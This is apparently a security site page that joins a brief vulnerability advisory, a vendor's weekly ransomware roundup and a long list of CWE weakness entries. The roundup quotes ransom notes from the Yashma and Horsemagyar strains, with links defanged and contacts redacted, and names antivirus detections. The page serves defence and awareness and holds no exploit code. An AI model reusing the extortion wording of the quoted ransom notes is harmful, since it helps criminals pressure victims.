This vulnerability allows remote attackers to disclose sensitive information on affected installations of KeySight N6841A RF Sensor. Authentication is not required to exploit this vulnerability.
Monthly Archives: May 2022
Ransomware Roundup – 2022/05/26
FortiGuard Labs became aware of a number of new Ransomware strains for the week of May 23rd, 2022. It is imperative to raise awareness about new ransomware as infections can cause severe damage to the affected machines and organizations. This Threat Signal covers Yashma ransomware, GoodWill ransomware and Horsemagyar ransomware along with Fortinet protections against them.What is Yashma Ransomware?Yashma ransomware is a new and is generated through Yashma ransomware builder. It is claimed as the sixth version of Chaos ransomware builder. Reportedly, compared to the fifth version, Yashma ransomware builder now supports the “forbidden country” option which attackers can choose not to run the generated ransomware based on the victim’s location. The new builder also enables the ransomware to stop a wide variety of services running on the compromised machine such as anti-malware solutions, and Remote Desktop and Backup services. Additionally, it is important to note that from the fifth version of Chaos ransomware builder, the crafted ransomware can successfully encrypt files larger than 2,117,152 bytes and no longer corrupts them.A known sample of Yashma ransomware has the following ransom note:All of your files have been encrypted with Yashma ransomwareYour computer was infected with a ransomware. Your files have been encrypted and you won’tbe able to decrypt them without our help.What can I do to get my files back?You can buy our specialdecryption software, this software will allow you to recover all of your data and remove theransomware from your computer.The price for the software is $1,500. Payment can be made in Bitcoin only.How do I pay, where do I get Bitcoin?Purchasing Bitcoin varies from country to country, you are best advised to do a quick google searchyourself to find out how to buy Bitcoin.Many of our customers have reported these sites to be fast and reliable:Coinmama – hxxps://www[.]coinmama[.]com Bitpanda – hxxps://www[.]bitpanda[.]comPayment informationAmount: 0.1473766 BTCBitcoin Address: [removed] At the time of this writing, the attacker’s bitcoin wallet has no transactions.FortiGuard Labs previously released several blogs on Chaos ransomware. See the Appendix for links to “Chaos Ransomware Variant Sides with Russia” and “Chaos Ransomware Variant in Fake Minecraft Alt List Brings Destruction to Japanese Gamers”.What is the Status of Coverage for Yashma ransomware?FortiGuard Labs provides the following AV coverage against a known sample of Yashma ransomware:MSIL/Filecoder.APU!tr.ransomWhat is GoodWill Ransomware?GoodWill ransomware was recently discovered, however it appears to have been first observed in March 2022. The ransomware encrypts files on the compromised machine and adds a “.gdwill” file extension to the affected files.Unlike other ransomware that demands ransom to recover the encrypted files, GoodWill asks the victim to do three good deeds. Firstly, the victim must provide clothes and blankets to needy people on the street. Secondly, the victim must feed dinner to five children at a pizza or fried chicken joint. Lastly, the victim must visit a local hospital and provide financial assistance to those in need. After finishing each deed, proof must be provided to the attacker, and a decryption tool and video instruction will be provided to the victim after completing all the deeds.What is the Status of Coverage for GoodWill ransomware?FortiGuard Labs provides the following AV coverage against GoodWill ransomware:MSIL/Filecoder.AGR!tr.ransomWhat is Horsemagyar Ransomware?Horsemagyar ransomware is a new variant of Sojusz ransomware that was recently discovered. It encrypts files on the compromised machine and adds “.[10 digit ID number].spanielearslook.likeoldboobs” file extension to the encrypted files. The ransomware leaves a ransom note as Horse.txt. The first sighting of Sojusz ransomware goes back to February, 2022 and it added a “.[10 digit ID number].[attacker’s email address].bec” extension to the files it encrypted.Example of ransom note left behind by Horsemagyar ransomware is below:::: Hello my dear friend :::Unfortunately for you, a major IT security weakness left you open to attack, your files have been encryptedIf you want to restore them,write to our skype – [removed] DECRYPTIONAlso you can write ICQ live chat which works 24/7 @[removed]Install ICQ software on your PC https://icq[.]com/windows/ or on your mobile phone search in Appstore / Google market ICQWrite to our ICQ @HORSEMAGYAR https://icq[.]im/[removed]If we not reply in 6 hours you can write to our mail but use it only if previous methods not working – [removed]@onionmail.orgAttention!* Do not rename encrypted files.* Do not try to decrypt your data using third party software, it may cause permanent data loss.* We are always ready to cooperate and find the best way to solve your problem.* The faster you write, the more favorable the conditions will be for you.* Our company values its reputation. We give all guarantees of your files decryption,such as test decryption some of themWe respect your time and waiting for respond from your sidetell your MachineID: MAHINE_ID and LaunchID: LAUNCH__IDSensitive data on your system was DOWNLOADED.If you DON’T WANT your sensitive data to be PUBLISHED you have to act quickly.Data includes:- Employees personal data, CVs, DL, SSN.- Complete network map including credentials for local and remote services.- Private financial information including: clients data, bills, budgets, annual reports, bank statements.- Manufacturing documents including: datagrams, schemas, drawings in solidworks format- And more…What is the Status of Coverage against Horsemagyar Ransomware?FortiGuard Labs provides the following AV coverage against Horsemagyar ransomware:W32/Filecoder.NSF!tr.ransomAnything Else to Note?Victims of ransomware are cautioned against paying ransoms by such organizations as CISA, NCSC, the FBI, and HHS. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities which could potentially be illegal according to a U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) advisory.
CWE
CWE (Common Weakness Enumeration) is a list of common types of hardware and software defects that have security implications. The CWE list can be used as a framework to describe and communicate such vulnerabilities in terms of CWEs.
The goal is to support all those methods (including automatic ones) to control and prevent software errors. It can be used at the development stage, during the Code Review activity, and later on during the penetration test activity to classify and communicate the vulnerability type to developers. The system is at version 4.7 and contains over 600 categories of weaknesses and vulnerabilities
The CWE Top 25 Most Dangerous Software Weakness List is a list of the most common programming errors that can lead to software vulnerabilities. Vulnerabilities present in the CWE Top 25 are usually easy to detect and exploit. For example, the CWE-79 is related to Cross-Site Scripting while the CWE-89 to SQL Injection. A similar project is Top Ten Owasp (Open Web Application Security Project). Compared to the CWE Top 25, the Top Ten OWASP focuses solely on vulnerabilities of web applications.
The CWE Most Important Hardware Weakness List serves the same purpose, but it focuses on hardware defects.
Please check our post about Vulnerability Analysis to learn more about CWE usage.
Please find a list of all the CWE below or use the search box above to find a specific CWE.
-
CWE-40 – Path Traversal: ‘\UNCsharename’ (Windows UNC Share)
Description An attacker can inject a Windows UNC share (‘\UNCsharename’) into a software system to potentially redirect access to an unintended location or arbitrary file. Modes of Introduction: – Implementation Related Weaknesses CWE-36 Consequences Confidentiality, Integrity: Read Files or Directories, Modify Files or Directories Potential Mitigations Phase: Implementation Effectiveness: High Description: …
-
CWE-400 – Uncontrolled Resource Consumption
Description The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. Modes of Introduction: – Operation Likelihood of Exploit: High Related Weaknesses CWE-664 Consequences Availability: DoS: Crash, Exit, or…
-
CWE-356 – Product UI does not Warn User of Unsafe Actions
Description The software’s user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system. Software systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the…
-
CWE-357 – Insufficient UI Warning of Dangerous Operations
Description The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-693 Consequences Non-Repudiation: Hide Activities Potential Mitigations CVE References CVE-2007-1099 User not sufficiently warned if host key…
-
CWE-358 – Improperly Implemented Security Check for Standard
Description The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-573 CWE-693 CWE-345 CWE-290 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations CVE References CVE-2002-0862 Browser…
-
CWE-36 – Absolute Path Traversal
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as “/abs/path” that can resolve to a location that is outside of that directory. This allows attackers to traverse the file system to access files or directories that…
-
CWE-360 – Trust of System Event Data
Description Security based on event locations are insecure and can be spoofed. Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop…
-
CWE-362 – Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’)
Description The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently. Modes of Introduction: – Architecture and Design …
-
CWE-363 – Race Condition Enabling Link Following
Description The software checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the software to access the wrong file. While developers might expect that there is a very narrow time window between…
-
CWE-364 – Signal Handler Race Condition
Description The software uses a signal handler that introduces a race condition. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-362 CWE-415 CWE-416 CWE-123 Consequences Integrity, Confidentiality, Availability: Modify Application Data, Modify Memory, DoS: Crash, Exit, or Restart, Execute Unauthorized Code or Commands It may be possible…
-
CWE-365 – DEPRECATED: Race Condition in Switch
Description This entry has been deprecated. There are no documented cases in which a switch’s control expression is evaluated more than once. It is likely that this entry was initially created based on a misinterpretation of the original source material. The original source intended to explain how switches could be unpredictable when using threads, if…
-
CWE-366 – Race Condition within a Thread
Description If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-362 CWE-662 CWE-662 Consequences Integrity, Other: Alter Execution Logic, Unexpected…
-
CWE-367 – Time-of-check Time-of-use (TOCTOU) Race Condition
Description The software checks the state of a resource before using that resource, but the resource’s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state. This weakness can…
-
CWE-368 – Context Switching Race Condition
Description A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product’s behavior during the switch. This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the…
-
CWE-369 – Divide By Zero
Description The product divides a value by zero. This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height. Modes of Introduction: – Implementation Likelihood of Exploit:…
-
CWE-37 – Path Traversal: ‘/absolute/pathname/here’
Description A software system that accepts input in the form of a slash absolute path (‘/absolute/pathname/here’) without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files. Modes of Introduction: – Implementation Related Weaknesses CWE-36 CWE-160 Consequences Confidentiality, Integrity: Read Files or Directories, Modify…
-
CWE-370 – Missing Check for Certificate Revocation after Initial Check
Description The software does not check the revocation status of a certificate after its initial revocation check, which can cause the software to perform privileged actions even after the certificate is revoked at a later time. If the revocation status of a certificate is not checked before each action that requires privileges, the system may…
-
CWE-372 – Incomplete Internal State Distinction
Description The software does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-664 Consequences Integrity, Other:…
-
CWE-373 – DEPRECATED: State Synchronization Error
Description This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662). Modes of Introduction: Related Weaknesses Consequences Potential Mitigations CVE References
-
CWE-374 – Passing Mutable Objects to an Untrusted Method
Description The program sends non-cloned mutable data as an argument to a method or function. The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data,…
-
CWE-375 – Returning a Mutable Object to an Untrusted Caller
Description Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function. In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously…
-
CWE-337 – Predictable Seed in Pseudo-Random Number Generator (PRNG)
Description A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time. The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG. Modes of Introduction:…
-
CWE-338 – Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Description The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG’s algorithm is not cryptographically strong. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-330 CWE-330 Consequences Access Control: Bypass Protection Mechanism If a PRNG is used for authentication and authorization, such…
-
CWE-339 – Small Seed Space in PRNG
Description A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks. PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying…
-
CWE-34 – Path Traversal: ‘….//’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘….//’ (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity:…
-
CWE-340 – Generation of Predictable Numbers or Identifiers
Description The product uses a scheme that generates numbers or identifiers that are more predictable than required. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-330 Consequences Other: Varies by Context Potential Mitigations CVE References
-
CWE-341 – Predictable from Observable State
Description A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-340 Consequences Other: Varies by Context This weakness could be exploited by an attacker…
-
CWE-342 – Predictable Exact Value from Previous Values
Description An exact value or random number can be precisely predicted by observing previous values. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-340 Consequences Other: Varies by Context Potential Mitigations Phase: Description: Increase the entropy used to seed a PRNG. Phase: Architecture and Design, Requirements Description: Use products or…
-
CWE-343 – Predictable Value Range from Previous Values
Description The software’s random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated. The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker…
-
CWE-344 – Use of Invariant Value in Dynamically Changing Context
Description The product uses a constant value, name, or reference, but this value can (or should) vary across different environments. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-330 Consequences Other: Varies by Context Potential Mitigations CVE References CVE-2002-0980 Component for web browser writes an error message to a known…
-
CWE-345 – Insufficient Verification of Data Authenticity
Description The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-693 Consequences Integrity, Other: Varies by Context, Unexpected State Potential Mitigations CVE References
-
CWE-346 – Origin Validation Error
Description The software does not properly verify that the source of data or communication is valid. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-345 CWE-345 CWE-284 Consequences Access Control, Other: Gain Privileges or Assume Identity, Varies by Context An attacker can access any functionality that is inadvertently accessible to the…
-
CWE-347 – Improper Verification of Cryptographic Signature
Description The software does not verify, or incorrectly verifies, the cryptographic signature for data. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-345 CWE-345 Consequences Access Control, Integrity, Confidentiality: Gain Privileges or Assume Identity, Modify Application Data, Execute Unauthorized Code or Commands An attacker could gain access to sensitive data and…
-
CWE-348 – Use of Less Trusted Source
Description The software has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-345 Consequences Access Control: Bypass Protection Mechanism, Gain Privileges or…
-
CWE-349 – Acceptance of Extraneous Untrusted Data With Trusted Data
Description The software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-345 Consequences Access Control, Integrity: Bypass Protection Mechanism, Modify Application Data An attacker could package…
-
CWE-35 – Path Traversal: ‘…/…//’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘…/…//’ (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity:…
-
CWE-350 – Reliance on Reverse DNS Resolution for a Security-Critical Action
Description The software performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-290 CWE-923 CWE-807 CWE-923 Consequences Access Control:…
-
CWE-351 – Insufficient Type Distinction
Description The software does not properly distinguish between different types of elements in a way that leads to insecure behavior. Modes of Introduction: – Implementation Related Weaknesses CWE-345 CWE-436 Consequences Other: Other Potential Mitigations CVE References CVE-2005-2260 Browser user interface does not distinguish between user-initiated and synthetic events. CVE-2005-2801 Product does…
-
CWE-352 – Cross-Site Request Forgery (CSRF)
Description The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible…
-
CWE-353 – Missing Support for Integrity Check
Description The software uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum. If integrity check values or “checksums” are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality…
-
CWE-354 – Improper Validation of Integrity Check Value
Description The software does not validate or incorrectly validates the integrity check values or “checksums” of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission. Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the…
-
CWE-318 – Cleartext Storage of Sensitive Information in Executable
Description The application stores sensitive information in cleartext in an executable. Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode…
-
CWE-319 – Cleartext Transmission of Sensitive Information
Description The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. Many communication channels can be “sniffed” by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty…
-
CWE-32 – Path Traversal: ‘…’ (Triple Dot)
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘…’ (triple dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity: Read Files…
-
CWE-321 – Use of Hard-coded Cryptographic Key
Description The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-798 CWE-798 CWE-798 Consequences Access Control: Bypass Protection Mechanism, Gain Privileges or Assume Identity If hard-coded cryptographic keys are used, it…
-
CWE-322 – Key Exchange without Entity Authentication
Description The software performs a key exchange with an actor without verifying the identity of that actor. Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor…
-
CWE-323 – Reusing a Nonce, Key Pair in Encryption
Description Nonces should be used for the present occasion and only once. Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-344 Consequences Access Control: Bypass Protection Mechanism,…
-
CWE-324 – Use of a Key Past its Expiration Date
Description The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key. While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged…
-
CWE-325 – Missing Cryptographic Step
Description The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm. Modes of Introduction: – Implementation Related Weaknesses CWE-573 CWE-358 Consequences Access Control: Bypass Protection Mechanism Confidentiality, Integrity: Read Application Data, Modify Application Data Accountability, Non-Repudiation: Hide Activities Potential Mitigations…
-
CWE-326 – Inadequate Encryption Strength
Description The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources. Modes of Introduction: –…
-
CWE-327 – Use of a Broken or Risky Cryptographic Algorithm
Description The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information. The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break…
-
CWE-328 – Use of Weak Hash
Description The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same…
-
CWE-329 – Generation of Predictable IV with CBC Mode
Description The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-1204 CWE-573 Consequences Confidentiality: Read…
-
CWE-33 – Path Traversal: ‘….’ (Multiple Dot)
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘….’ (multiple dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity: Read Files…
-
CWE-330 – Use of Insufficiently Random Values
Description The software uses insufficiently random numbers or values in a security context that depends on unpredictable numbers. When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive…
-
CWE-331 – Insufficient Entropy
Description The software uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-330 CWE-330 Consequences Access Control, Other: Bypass Protection Mechanism, Other An attacker could guess the random numbers…
-
CWE-332 – Insufficient Entropy in PRNG
Description The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-331 Consequences Availability: DoS: Crash, Exit, or Restart If a pseudo-random number generator is using a limited…
-
CWE-333 – Improper Handling of Insufficient Entropy in TRNG
Description True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block. The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security. Modes of Introduction: – Architecture and Design Likelihood of…
-
CWE-334 – Small Space of Random Values
Description The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-330 Consequences Access Control, Other: Bypass Protection Mechanism, Other An attacker could easily guess the values used. This could lead to…
-
CWE-335 – Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)
Description The software uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-330 CWE-330 Consequences Access Control, Other: Bypass Protection Mechanism, Other If a PRNG is used incorrectly, such as using the same seed for each initialization or using a…
-
CWE-336 – Same Seed in Pseudo-Random Number Generator (PRNG)
Description A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized. Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to…
-
CWE-299 – Improper Check for Certificate Revocation
Description The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised. An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly…
-
CWE-30 – Path Traversal: ‘dir..filename’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘dir..filename’ (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity:…
-
CWE-300 – Channel Accessible by Non-Endpoint
Description The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint. In order to establish secure communication between…
-
CWE-301 – Reflection Attack in an Authentication Protocol
Description Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-287 CWE-327 Consequences Access Control: Gain Privileges or Assume Identity The primary result of reflection attacks…
-
CWE-302 – Authentication Bypass by Assumed-Immutable Data
Description The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-807 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations Phase: Architecture and Design, Operation, Implementation Description: …
-
CWE-303 – Incorrect Implementation of Authentication Algorithm
Description The requirements for the software dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect. This incorrect implementation may allow authentication to be bypassed. Modes of Introduction: – Implementation Related Weaknesses CWE-287 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations CVE References CVE-2003-0750 Conditional…
-
CWE-304 – Missing Critical Step in Authentication
Description The software implements an authentication technique, but it skips a step that weakens the technique. Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-573 Consequences Access…
-
CWE-305 – Authentication Bypass by Primary Weakness
Description The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations CVE References CVE-2002-1374 The provided password…
-
CWE-306 – Missing Authentication for Critical Function
Description The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-287 CWE-287 Consequences Access Control, Other: Gain Privileges or Assume Identity, Other Exposing critical functionality essentially…
-
CWE-307 – Improper Restriction of Excessive Authentication Attempts
Description The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-287 CWE-799 Consequences Access Control: Bypass Protection Mechanism An attacker could perform an arbitrary…
-
CWE-308 – Use of Single-factor Authentication
Description The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme. While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused,…
-
CWE-309 – Use of Password System for Primary Authentication
Description The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism. Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well known attacks,and such frequent compromise that their use in the most…
-
CWE-31 – Path Traversal: ‘dir….filename’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘dir….filename’ (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality,…
-
CWE-311 – Missing Encryption of Sensitive Data
Description The software does not encrypt sensitive or critical information before storage or transmission. The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-693 Consequences Confidentiality: Read Application…
-
CWE-312 – Cleartext Storage of Sensitive Information
Description The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere. Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode…
-
CWE-313 – Cleartext Storage in a File or on Disk
Description The application stores sensitive information in cleartext in a file, or on disk. The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which…
-
CWE-314 – Cleartext Storage in the Registry
Description The application stores sensitive information in cleartext in the registry. Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. Modes of Introduction: – Architecture and Design …
-
CWE-316 – Cleartext Storage of Sensitive Information in Memory
Description The application stores sensitive information in cleartext in memory. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-312 Consequences Confidentiality: Read Memory Potential Mitigations CVE References CVE-2001-1517 Sensitive authentication information in cleartext in memory. BID:10155 Sensitive authentication information in cleartext in memory. CVE-2001-0984 Password protector leaves passwords in memory…
-
CWE-317 – Cleartext Storage of Sensitive Information in GUI
Description The application stores sensitive information in cleartext within the GUI. An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which…
-
CWE-282 – Improper Ownership Management
Description The software assigns the wrong ownership, or does not properly verify the ownership, of an object or resource. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-284 Consequences Access Control: Gain Privileges or Assume Identity Potential Mitigations Phase: Architecture and Design, Operation Description: Very carefully manage the setting, management,…
-
CWE-283 – Unverified Ownership
Description The software does not properly verify that a critical resource is owned by the proper entity. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-282 Consequences Access Control: Gain Privileges or Assume Identity An attacker could gain unauthorized access to system resources. Potential Mitigations Phase: Architecture and Design, Operation…
-
CWE-284 – Improper Access Control
Description The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Modes of Introduction: – Architecture and Design Related Weaknesses Consequences Other: Varies by Context Potential Mitigations Phase: Architecture and Design, Operation Description: Very carefully manage the setting, management, and handling of privileges. Explicitly manage…
-
CWE-286 – Incorrect User Management
Description The software does not properly manage a user within its environment. Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-284 Consequences Other: Varies by Context Potential Mitigations CVE References
-
CWE-287 – Improper Authentication
Description When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-284 CWE-284 Consequences Integrity, Confidentiality, Availability, Access Control: Read Application Data, Gain Privileges or Assume Identity,…
-
CWE-288 – Authentication Bypass Using an Alternate Path or Channel
Description A product requires authentication, but the product has an alternate path or channel that does not require authentication. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-284 CWE-420 CWE-425 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations Phase: Architecture and Design Description: Funnel all access through a single…
-
CWE-289 – Authentication Bypass by Alternate Name
Description The software performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 Consequences Access Control: Bypass Protection…
-
